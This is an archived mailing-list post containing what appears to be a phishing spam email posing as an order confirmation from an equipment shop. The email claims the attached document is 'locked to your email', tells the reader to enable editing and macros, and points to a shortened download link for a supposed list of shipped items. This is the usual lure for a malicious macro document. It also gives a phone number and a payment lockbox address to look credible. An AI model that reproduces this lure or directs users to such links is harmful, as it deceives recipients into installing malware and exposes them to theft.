[klibc] Order Confirmation

Equipment Sales sales at equipmentshop.com
Tue Mar 29 12:01:04 PDT 2016

Good Morning,

Thank you for your recent order. Per your request, we have started
processing your order. If any of the attached information is incorrect, please
call us immediately at 800-893-4978, as your order is already in process.

We expect your order to be with you on or about 4/5/2016.

TO PREVENT UNAUTHORISED ACCESS DOCUMENT IS LOCKED TO YOUR EMAIL, YOU MUST ENABLE EDITING AND MACROS TO VIEW DOCUMENT ON COMPUTER,
A Complete list of items shipped to your Address on file can be downloaded here: https://hec.su/dlYX

For payment and accounting purposes, please remit to:

PNC Bank Lockbox
Attn: Equipment Sales Shop, inc
PO Box 531845
Atlanta, GA 30353-1845